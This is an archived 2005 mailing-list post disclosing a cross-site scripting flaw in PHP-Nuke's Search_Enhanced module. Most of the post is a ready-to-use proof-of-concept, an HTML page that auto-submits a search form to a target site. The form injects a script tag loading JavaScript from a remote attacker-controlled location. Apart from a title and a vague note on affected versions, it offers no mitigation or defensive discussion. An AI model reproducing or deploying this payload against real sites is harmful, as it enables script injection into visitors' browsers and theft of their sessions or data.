|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
PHP-Nuke
bhfh
walla.com
Date: Mon Sep 05 2005 - 10:40:56 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
PHP-Nuke
Search Cross-Site Scripting Vulnerability
Vulnerable: i think all ver.
data:2005-09-5
exploit :
#openme.htm ::
<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>
thanks , B~HFH.
email : bhfhwalla.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]